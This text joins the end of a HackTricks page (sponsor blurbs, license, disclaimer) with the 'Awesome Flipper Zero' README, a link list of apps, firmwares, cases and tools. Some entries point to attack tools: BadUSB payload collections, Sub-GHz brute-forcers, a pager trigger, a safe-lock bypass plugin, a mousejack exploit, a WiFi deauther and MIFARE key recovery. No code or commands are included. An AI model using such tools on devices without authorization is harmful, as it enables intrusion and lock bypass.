**guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) and [**blog**](https://websec.nl/blog/)! In addition to the above WebSec is also a **committed supporter of HackTricks.** {% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} ### [DragonJAR](https://www.dragonjar.org/) <figure><img src=".gitbook/assets/image (1) (1) (2) (4) (1).png" alt=""><figcaption></figcaption></figure> [**DragonJAR is a leading offensive cybersecurity company**](https://www.dragonjar.org/) **located in Colombia**. DragonJAR offers [comprehensive offensive cybersecurity services, such as **pentesting**](https://www.dragonjar.org/servicios-de-seguridad-informatica) in various areas and practically **any technology**, **Red Team** attack simulations, **physical** security testing, **stress testing**, social engineering, source **code security review**, and cybersecurity training. Additionally, they organize the **DragonJAR Security Conference**, [an international cybersecurity congress](https://www.dragonjarcon.org/) that has been held for over a decade, becoming a showcase for the latest security research in Spanish and of great relevance in the region. [**DragonJAR es una empresa líder en ciberseguridad ofensiva**](https://www.dragonjar.org/) **ubicada en Colombia**, DragonJAR ofrece [servicios integrales de seguridad informática ofensiva, como **pentesting**](https://www.dragonjar.org/servicios-de-seguridad-informatica) en diversas áreas y prácticamente **cualquier tecnología**, simulaciones de ataque **Red Team**, pruebas de seguridad **física**, **pruebas de estrés**, ingeniería social, revisión de seguridad en **código fuente** y capacitación en seguridad informática. Asimismo, organiza la **DragonJAR Security Conference**, [un congreso internacional de seguridad informática](https://www.dragonjarcon.org/) que se ha realizado durante más de una década, convirtiéndose en el escaparate para las últimas investigaciones de seguridad en español y de gran relevancia en la región. ### [SYN CUBES](https://www.syncubes.com/) <figure><img src=".gitbook/assets/image (10) (2) (1).png" alt=""><figcaption></figcaption></figure> **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. {% embed url="https://www.syncubes.com/" %} ## License **Copyright © Carlos Polop 2023. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\ **If you want to use it with commercial purposes, contact me.** ## **Disclaimer** {% hint style="danger" %} This book, 'HackTricks,' is intended for educational and informational purposes only. The content within this book is provided on an 'as is' basis, and the authors and publishers make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability, or availability of the information, products, services, or related graphics contained within this book. Any reliance you place on such information is therefore strictly at your own risk. The authors and publishers shall in no event be liable for any loss or damage, including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this book. Furthermore, the techniques and tips described in this book are provided for educational and informational purposes only, and should not be used for any illegal or malicious activities. The authors and publishers do not condone or support any illegal or unethical activities, and any use of the information contained within this book is at the user's own risk and discretion. The user is solely responsible for any actions taken based on the information contained within this book, and should always seek professional advice and assistance when attempting to implement any of the techniques or tips described herein. By using this book, the user agrees to release the authors and publishers from any and all liability and responsibility for any damages, losses, or harm that may result from the use of this book or any of the information contained within it. {% endhint %} <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details>
<hr> <a href="https://github.com/djsime1/awesome-flipperzero"> <img src="https://user-images.githubusercontent.com/8518150/158502722-2532719c-a680-4405-b230-d45474a5decd.png" align="center" alt="Awesome Flipper Zero" title="Awesome Flipper Zero"> </a> <hr> <h3 align="center"> A collection of Awesome resources for the <a href="https://flipperzero.one">Flipper Zero</a> device.<br><br> <a href="#"> <img src="https://awesome.re/badge.svg" alt="Awesome" height=24> <img src="https://img.shields.io/badge/Powered%20by-Dolphins-blue" alt="Powered by dolphins" height=24> <img src="https://img.shields.io/badge/Approved%20by-Lurat-brightgreen" alt="Approved by Lurat" height=24 title="Lurat is the name of my Flipper"> <img src="https://img.shields.io/badge/Hack-The%20Planet-orange" alt="Hack the planet" height=24> </a> </h3> <table align="center"><tr> <td> <h3 align="center"> 👋 New to Flipper Zero? Got questions?<br> Check out the <a href="https://github.com/djsime1/awesome-flipperzero/blob/main/FAQ.md">FAQ Document</a>❗ </h3> </td> <td> <h3 align="center"> 🚫 Not affiliated with<br> <a href="https://www.flipperdevices.com/">Flipper Devices Inc.</a> </h3> </td> </tr></table> <hr> <!-- DO NOT MODIFY ABOVE --> ## Databases & Dumps - [`UberGuidoZ Playground` Large collection of files, documentation, and dumps of all kinds.](https://github.com/UberGuidoZ/Flipper) - [`Flipper-IRDB` Many IR dumps for various appliances.](https://github.com/logickworkshop/Flipper-IRDB) - [`FlipperZero-TouchTunes` Dumps of TouchTune's remote.](https://github.com/jimilinuxguy/flipperzero-touchtunes) - [`Flipper Maker` Generate Flipper Zero files on the fly.](https://flippermaker.github.io/) - [`FlipperAmiibo` Bank vault of Amiibos to Flipper's format.](https://github.com/Gioman101/FlipperAmiibo) - [`FlipperMusicRTTTL` Collection of musics for FlipperZero Music Player.](https://github.com/neverfa11ing/FlipperMusicRTTTL) - [`flipper-music-files` Much smaller collection of musics for FlipperZero Music Player.](https://github.com/Tonsil/flipper-music-files) - [`Flipper BadUSB Payloads` Collection of payloads formatted to work on the Flipper Zero.](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB) - [`FlipperZero-Goodies` Intercom keys, scripts, etc.](https://github.com/wetox-team/flipperzero-goodies) - [`T119 bruteforcer` Triggers Retekess T119 restaurant pagers.](https://github.com/xb8/t119bruteforcer) - [`flipperzero-bruteforce` Generate .sub files to brute force Sub-GHz OOK.](https://github.com/tobiabocchi/flipperzero-bruteforce) - [`UNC0V3R3D BadUSB collection` Yet another BadUSB collection.](https://github.com/UNC0V3R3D/Flipper_Zero-BadUsb) - [`Flipper-StarNew` Universal Intercom Keys.](https://github.com/GlUTEN-BASH/Flipper-Starnew) - [`FalsePhilosophers Flipper BadUSB` Flipper zero community ducky payload repo.](https://github.com/FalsePhilosopher/badusb) - [`SerialHex2FlipperZeroInfrared` Convert IR serial messages into FlipperZero compatible IR files.](https://github.com/maehw/SerialHex2FlipperZeroInfrared) ## Applications & Plugins - [`Flipper-Plugin-Tutorial` Updated plugin tutorial based on new build methods.](https://github.com/csBlueChip/FlipperZero_plugin_howto) - [`Spectrum analyzer` Sub-GHz frequency spectrum analyzer.](https://github.com/jolcese/flipperzero-firmware/tree/spectrum/applications/spectrum_analyzer) - [`Tetris` A rudimentary Tetris game.](https://github.com/jeffplang/flipperzero-firmware/tree/tetris_game/applications/tetris_game) - [`Flappy Bird` The name says it all.](https://github.com/DroomOne/flipperzero-firmware/tree/dev/applications%2Fflappy_bird) - [`Mouse jiggler` Keeps PC screens on by acting as a moving mouse.](https://github.com/MuddledBox/flipperzero-firmware/tree/Mouse_Jiggler/applications/mouse_jiggler) - [`floopper-bloopper` LD#47 Game.](https://github.com/glitchcore/floopper-bloopper) - [`NRF24 & Mousejacking` PoC NRF24 library and mousejack exploitation app.](https://github.com/mothball187/flipperzero-nrf24) - [`UPC-A Barcode Generator` Can be used to create any UPC-A barcode.](https://github.com/McAzzaMan/flipperzero-firmware/tree/UPC-A_Barcode_Generator/applications/barcode_generator) - [`Sentry Safe` Plugin that can open any Sentry Safe and Master Lock electronic safe without entering pin code.](https://github.com/H4ckd4ddy/flipperzero-sentry-safe-plugin) - [`Dec/Hex Converter` Small "real time" decimal/hexadecimal converter.](https://github.com/theisolinearchip/flipperzero_stuff/tree/main/applications/dec_hex_converter) - [`MultiConverter` Multi-unit converter that can be easily expanded with new units and conversion methods.](https://github.com/theisolinearchip/flipperzero_stuff/tree/main/applications/multi_converter) - [`Doom` Doom-like clone for Flipper Zero.](https://github.com/p4nic4ttack/doom-flipper-zero) - [`bpm-tapper` Tap along to a song to measure beats per minute.](https://github.com/panki27/bpm-tapper) - [`Metronome` Musical metronome.](https://github.com/panki27/Metronome) - [`USB Keyboard` A refactor of the BT remote to work over USB. Allows the Flipper to act as an USB HID keyboard.](https://github.com/huuck/FlipperZeroUSBKeyboard) - [`Minesweeper` Minesweeper implementation.](https://github.com/panki27/minesweeper) - [`SD Load Applications` Prebuilt applications (FAP) for popular firmware options.](https://github.com/UberGuidoZ/Flipper/tree/main/Applications) - [`Tuning Fork` Use your flipper as a tuning fork.](https://github.com/besya/flipperzero-tuning-fork) - [`GPS` Display data from a serial GPS module.](https://github.com/ezod/flipperzero-gps) - [`USB HID Autofire` Send left-clicks as a USB HID device.](https://github.com/pbek/usb_hid_autofire) - [`Flipper Authenticator` Generate TOTP authentication codes.](https://github.com/akopachov/flipper-zero_authenticator/) - [`Unitemp` Temperature, humidity and pressure sensors reader (DHT11/22, DS18B20, BMP280, HTU21x and more)](https://github.com/quen0n/unitemp-flipperzero) - [`Flipp Pomodoro` Pomodoro Timer Tool for productivity.](https://github.com/Th3Un1q3/flipp_pomodoro) - [`COM Port Scanner Emulator` Barcode Scanner Emulator.](https://github.com/polarikus/flipper-zero_bc_scanner_emulator) - [`Xbox Controller` Easy controller for Xbox One with IR](https://github.com/gebeto/flipper-xbox-controller) - [`Reversi` The classic Reversi game](https://github.com/dimat/flipperzero-reversi) - [`Servo Tester` Servo Tester App](https://github.com/mhasbini/ServoTesterApp) ## Firmwares & Tweaks <table align="right"> <tr><th><strong>Hey you!</strong></th></tr> <tr><td>🔰 <em><a href="https://github.com/djsime1/awesome-flipperzero/blob/main/Firmwares.md">Click here</a> for a feature<br>comparison of these firmwares!</em></td></tr> </table> - [`Unleashed` Unlocked firmware with rolling codes support & community plugins, stable tweaks, and games.](https://github.com/DarkFlippers/unleashed-firmware) - [`RogueMaster` Fork of Unleashed firmware with custom graphics, experimental tweaks, community plugins and games.](https://github.com/RogueMaster/flipperzero-firmware-wPlugins) - [`Xtreme` Official fork with cleaned up codebase, more module extensions and custom assets.](https://github.com/ClaraCrazy/Flipper-Xtreme) - [`Dexv` Xtreme fork; The "Will it blend?" of custom firmwares.](https://github.com/DXVVAY/Dexvmaster0) - [`SquachWare` Fork of official firmware which adds custom graphics, community applications & files.](https://github.com/skizzophrenic/SquachWare-CFW) - [`v1nc flipper zero firmware` Unleashed fork with support for different Duckyscript keyboard layouts & community plugins.](https://github.com/v1nc/flipperzero-firmware) - [`Wetox` Very similar to the official branch, with a few small tweaks.](https://github.com/wetox-team/flipperzero-firmware) - [`Muddled Forks` Less-active firmware modifications.](https://github.com/MuddledBox/flipperzero-firmware/tree/muddled_dev) - [`OpenHaystack BLE mod` Very old PoC that makes Flipper behave like an AirTag.](https://github.com/AlexStrNik/flipperzero-firmware) ## Graphics & Animations - [`Talking Sasquach Animations` Literally wrote the book on making animations.](https://github.com/skizzophrenic/Talking-Sasquach) - [`Lab401 Animation Video` YouTube video with a step by step from Talking Sasquach.](https://www.youtube.com/watch?v=Nq5DXhOMo5s) - [`Kuronons Graphics` Custom animations, passport backgrounds & profile pictures.](https://github.com/Kuronons/FZ_graphics) - [`Flipper Zero Animation Process` Google Doc step by step from Talking Sasquach.](https://docs.google.com/document/d/e/2PACX-1vR_nZRakD6iwJVQS8Pf4y7Wm4klcucrC7EKVO8m_DQV63To7e-alqD0yaoO3sTygjcChfcRo80Hdeet/pub) - [`Flipper Animation Manager` Visualize and manage animations directly from your computer.](https://github.com/Ooggle/FlipperAnimationManager) - [`zip2Animation` Utility to assist in creating animations.](https://github.com/CharlesTheGreat77/zip2Animation) - [`Haseosama Animations` Great collection of custom animations.](https://github.com/Haseosama/FZ_Animations) - [`Animations by stopoxy` Another great custom animation collection.](https://github.com/stopoxy/FZAnimations) - [`Wr3nch Animations` Some custom animations and scripts.](https://github.com/wrenchathome/flip0anims) - [`Dexv Graphics` Custom animations and resources.](https://github.com/DXVVAY/dexv-graphics) - [`DoobTheGoober Animations` Custom animations from the creator of zip2Animation](https://github.com/CharlesTheGreat77/FlipperZeroAnimation) - [`UberGuidoZ Graphics` Brief description and links to resources, including PYX host.](https://github.com/UberGuidoZ/Flipper/tree/main/Graphics) - [`Animations by mnenkov` A dump with animations and manifest creator for batch files.](https://github.com/mnenkov/flipper-zero-animations) ## Modules & Cases - [`FlipperZero-Hardware` 3D-Printable cases with custom iButton interface.](https://github.com/s0ko1ex/FlipperZero-Hardware) - [`Flipper Zero Cases` 3D-Printable case & cover models.](https://github.com/MuddledBox/FlipperZeroCases) - [`FlipperZero-Protoboards-Kicad` KiCad prototype boards.](https://github.com/lomalkin/flipperzero-protoboards-kicad) - [`Pelican case` Big case to hold Flipper and USB.](https://www.printables.com/model/204882-flipper-zero-case) - [`Hard case` Smaller than pelican case, but still bulky.](https://www.thingiverse.com/thing:5387015) - [`WiFi Module v1 Case` Small cover for the WiFi dev board.](https://www.printables.com/model/179910-case-for-flipper-zero-wi-fi-module-v1) - [`Flipper screen protector` An alternative screen protector for Flipper.](https://www.photodon.com/p/2419-01.html) - [`WiFi Scanner Module` Scans for WiFi networks via a custom Wemos module board.](https://github.com/SequoiaSan/FlipperZero-WiFi-Scanner_Module) - [`WiFi Scanner Module Flasher` Web flasher for module firmware above.](https://sequoiasan.github.io/FlipperZero-WiFi-Scanner_Module/) - [`WiFi DSTIKE Deauther` Preforms WiFi deauth attacks via a custom ESP8266 module board.](https://github.com/SequoiaSan/FlipperZero-Wifi-ESP8266-Deauther-Module) - [`WiFi Deauther Module Flasher` Web flasher for module firmware above.](https://sequoiasan.github.io/FlipperZero-Wifi-ESP8266-Deauther-Module/) - [`Skadis holder` Flipper Zero holder for Ikea Skadis.](https://www.thingiverse.com/thing:5434476) - [`Flipper Zero Boards` ESP32 and NRF24 daughterboards for the Flipper.](https://github.com/DrB0rk/Flipper-Zero-Boards) - [`Flipper Zero Car Mount` Uses foam from the original box.](https://www.thingiverse.com/thing:5464899) - [`Soft TPU cover` Similar to the official silicone case.](https://www.printables.com/en/model/272676-soft-tpu-flipper-zero-cover) - [`Flipper-Boy` Flipper Zero Case with 22mm Watch Strap Adapter.](https://www.printables.com/model/304243-flipper-boy) - [`WiFi Devboard Pelican Case` Top case that works with the 4mm FZ Pelican case.](https://github.com/Z3BRO/Flipper-Zero-Pelican-Case-Wifi-Devboard) - [`FlipperZero RGB backlight` Replacing stock backlight with RGB](https://github.com/quen0n/flipperzero-firmware-rgb) - [`The Mayhem Fin` ESP32 with WiFi, BT/BLE, Micro-SD, Camera, Flashlight, NRF24/CC1101, and more.](https://github.com/eried/flipperzero-mayhem) ## Off-device & Debugging - [`Official Web Interface` Web interface to interact with Flipper, including Paint and SUB/IR analyzer.](https://lab.flipper.net/) - [`OOK to .sub` Python script to generate Flipper RAW .sub files from OOK bitstreams.](https://gist.github.com/jinschoi/f39dbd82e4e3d99d32ab6a9b8dfc2f55) - [`csv2ir` Script to convert IRDB CSV's to Flipper .ir files.](https://github.com/Spexivus/csv2ir) - [`flipperzero-sesproject` Segger Embedded Studio project.](https://github.com/hedger/flipperzero-sesproject) - [`FlipperScripts` Modify the state and level of your dolphin.](https://github.com/DroomOne/FlipperScripts) - [`Viewing system logs` Dump system logs to serial CLI.](https://gist.github.com/jaflo/50c35c46f3ecada7a18c9e5cc203a3f8) - [`AmiiboFlipperConverter` Script that converts Amiibo's to Flipper format.](https://github.com/Lucaslhm/AmiiboFlipperConverter/) - [`CLI Tools` Python scripts to screenshot/stream screen.](https://github.com/lomalkin/flipperzero-cli-tools) - [`Flipper File Toolbox` Scripts for generating Flipper data files.](https://github.com/evilpete/flipper_toolbox) - [`Marauder for Wifi Dev Board` See Flipper.bin in Releases by JustCallMeKoko.](https://github.com/justcallmekoko/ESP32Marauder) - [`VertProntoIR2FlipperIR` Converts Vert Pronto IR codes to Flipper format.](https://github.com/SkeletonMan03/VertProntoIR2FlipperIR) - [`FlippMibo` Yet another Amiibo to Flipper conversion script.](https://github.com/0xz00n/FlipMiibo) - [`mfkey32v2` MFC key recovery reader attack.](https://github.com/equipter/mfkey32v2) - [`Fztea` Connect to your Flipper's UI over serial or make it accessible via SSH.](https://github.com/jon4hz/fztea) - [`pyFlipper` Unofficial CLI wrapper writter in Python.](https://github.com/wh00hw/pyFlipper) - [`SUB Plotters / comparers` Python package to plot and compare multiple .sub files.](https://github.com/ShotokanZH/flipper_sub_plotters_comparers) - [`ClassicConverter` Converts Mifare Classic binary files to Flipper.](https://github.com/equipter/ClassicConverter) - [`ClassicConverterWeb` Converts between Mifare Classic binary and Flipper NFC file.](https://micsen.github.io/flipperNfcToBin/) - [`musicxml2fmf` Converts MusicXML files to Flipper Music Format.](https://github.com/white-gecko/musicxml2fmf) - [`BadUSB keyboard converter` Payload converted for non-US keyboard layouts.](http://helppox.com/badusbconvert.html) - [`U2F SSH Keys` U2F ECDSA SSH Key Generation using Flipper Zero.](https://gist.github.com/BlackPropaganda/44c40f7855a90e289a9477b654e54eb1) - [`flipper0` Rusty crate with safe interface to Flipper Firmware and autogen bindings underneath.](https://crates.io/crates/flipper0) - [`flipperzero-rs` Hand-crafted bindings to Flipper Firmware with custom build tool.](https://github.com/dcoles/flipperzero-rs) - [`fzfs` Flipper Zero filesystem driver.](https://github.com/dakhnod/fzfs) - [`Pagger` Sub-GHz generators for restaurants/kiosks paging systems.](https://meoker.github.io/pagger/) - [`FBT-AARCH64` A script that sets up FBT's toolchain on ARM devices.](https://github.com/qqmajikpp/FBT-AARCH64) ## Notes & References - [`Official battery self-repair guide` How to troubleshoot battery issues.](https://cdn.flipperzero.one/self-repair-guide.pdf) - [`Official firmware recovery guide` How to troubleshoot firmware issues.](https://docs.flipperzero.one/basics/firmware-update/firmware-recovery) - [`FZ Firmware Comparisons` Comparison of custom firmwares listed in this repo.](https://github.com/djsime1/awesome-flipperzero/blob/main/Firmwares.md) - [`Flipper Zero Hacking 101` Guides with screenshots, files, and general help.](https://flipper.pingywon.com/) - [`Reset forgotten PIN` How to reset your device's PIN code.](https://gist.github.com/djsime1/18d73b981249859f17aab3e2bfd2b600) - [`Atmanos Flipper Software Docs` Flipper development tutorials and information.](https://flipper.atmanos.com/docs/overview/intro) - [`Flipper Zero GPIO Pinout` Official GPIO pinouts.](https://miro.com/app/board/uXjVO_LaYYI=/?moveToWidget=3458764522696947614&cot=10) - [`Add-on Modules GPIO Pinouts` ESP32, ESP8266, ESP32-CAM, ESP32-WROOM, NRF24.](https://github.com/UberGuidoZ/Flipper/tree/main/GPIO) - [`Firmware roadmap` Official stock firmware roadmap.](https://miro.com/app/board/uXjVO_3D6xU=/?moveToWidget=3458764522498020058&cot=14) - [`Flipper Zero SW&HW keynote` (OUTDATED) Hardware & software architecture document.](https://miro.com/app/board/o9J_l1XZfbw=/?moveToWidget=3458764514405659414&cot=14) - [`Unofficial Community Wiki` To help consolidate all things Flipper (official and unofficial).](https://flipperzero.miraheze.org/wiki/Main_Page) - [`Flipper Zero disassembly guide` Difficulty: Moderate, Time: 8-15 Minutes.](https://www.ifixit.com/Guide/Flipper+Zero+Disassembly/151455) - [`Alternative disassembly video` Third-party video for disassembling the Flipper.](https://youtu.be/38pHe7M4vl8) - [`ESP32 Marauder on WiFi dev board` Portable WiFi/Bluetooth pentesting.](https://github.com/justcallmekoko/ESP32Marauder/wiki/flipper-zero) - [`ESP32 Marauder guide video` Companion video for the above link.](https://youtu.be/_YLTpNo5xa0) - [`Flipper Skylanders` How to read a Skylanders figure with Flipper.](https://github.com/V0lk3n/Flipper-Skylanders) - [`Flipper Zero Dimensions` Basic info on screen and case dimensions.](https://github.com/UberGuidoZ/Flipper/tree/main/FlipperZero_Dimensions) - [`Application CI/CD Guide` A complete guide on how to adopt flipper application to regular API changes.](https://gist.github.com/Th3Un1q3/233fa6900d13caa95c6383e53a92bed1) <!-- DO NOT MODIFY BELOW --> <hr> <h3 align="center">Want to make changes?</h3> <div align="center"> You can <kbd><a href="https://github.com/djsime1/awesome-flipperzero/edit/main/README.md">Edit this file</a></kbd> and open a Pull Request, or <kbd><a href="https://github.com/djsime1/awesome-flipperzero/discussions">Start a discussion</a></kbd> with your ideas.<br> Read the <a href="https://github.com/djsime1/awesome-flipperzero/blob/main/FAQ.md#meta-">Meta FAQ section</a> for more info. </div>